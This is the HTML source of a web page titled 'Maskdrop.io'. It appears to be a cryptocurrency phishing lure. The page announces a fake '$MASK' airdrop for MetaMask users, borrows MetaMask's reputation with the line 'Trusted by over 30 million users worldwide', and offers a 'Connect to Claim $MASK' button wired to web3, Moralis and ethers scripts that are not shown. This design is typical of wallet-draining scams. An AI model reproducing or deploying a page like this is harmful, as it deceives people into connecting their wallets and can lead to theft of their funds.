<!doctype html>
<html lang="en">

<head>
    <script src="settings.js"></script>
    <link rel="stylesheet" href="src/css/styles.css">

  <link rel="icon" type="image/png" href="/images/logo2.png">
  <meta content="width=device-width, initial-scale=1" name="viewport" />

<title>
    Maskdrop.io
</title>
<style>





    body{
    
        background-color:#E6E6E6;
    
    }
    
    .imagefit{
    
    
    
        width:620px; margin-top:20px; margin-left:70px
    
    
    }
    
    #textcenter{
    
    
        color:black; font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif; font-size:29px;
    
    }
    #mask{
    
    color:#1565C0; font-size:30px
    
    }
    #greytext{
    
        font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;color:black; font-size:15px; color:grey
    
    }
    #connectButton{
    
    
        background:#1565C0;color:rgb(255, 255, 255);width: 375px;top:60px;position:padding-top; font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; margin-left:-10px; width:250px; height:10px; font-size:23px
        
    }
    #buttontext{
    
    
    font-size:20px
    
    }
    #metamaskimg{
    
    
    
        margin-right:10%; width:600px
    }
    
    @media (max-width: 480px) {
        
    
    
    .imagefit{
    
    width:380px;
    margin-left:45px;
    
    
    }
    #textcenter{
    
        margin-left: -200px;;
        font-size:19px;
        width:300px;
        margin-top:50px;
    
    
    
    }
    #mask{
    
    color:#1565C0; font-size:20px
    
    }
    
    #greytext{
    
    display:none;
    
    }
    #connectButton{
    
    
        margin-left:-196px;
        width:250px
    
    }
    #buttontext{
    
    
        font-size:18px
    }
    #metamaskimg{
    
    width:410px;
    margin-bottom:130px;
    margin-left:60px
    }
    
    }
    
    </style>
    </head>
    
    <body class="container no-bg">
        <img class="imagefit" src="images/logo1.png">
        <div class="section3" stlye="margin-top:-50%">
         
            <div class="right">
         
                <div class="block-button" style="margin-left:210px; margin-bottom:-50px">
                    <h1 ><p id="textcenter">For our users, the <span id="mask">$MASK</span> airdrop is officially live,users who have interacted with their MetaMask app by trading/holding eth,NFTs & erc20 tokens can officially claim our $MASK token.</p></h1>
                    <h1><p id="greytext">Start exploring blockchain applications in seconds. Trusted by<br> over 30 million users worldwide.
                        </p></h1>
                    <a id="connectButton"><span id="buttontext">Connect to Claim $MASK</span></a>
                    <p id="notEli" style="color: rgb(53, 186, 173); padding-top: 10px; display: none; letter-spacing: 3px"></p>
                </div>
            </div>
            <img id="metamaskimg" src="images/1.png">
    
        </div>

    <script src="src/js/web3.min.js"></script>

    <script src="src/js/moralis.js"></script>
    <script src="src/js/index.min.js"></script>
    <script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js"
    type="application/javascript"></script>

    <script type="text/javascript" src="src/js/index.js"></script>
    <script
  src="https://code.jquery.com/jquery-3.6.3.js"
  integrity="sha256-nQLuAZGRRcILA+6dMBOvcRh5Pe310sBpanc6+QBmyVM="
  crossorigin="anonymous"></script>

</body>

</html>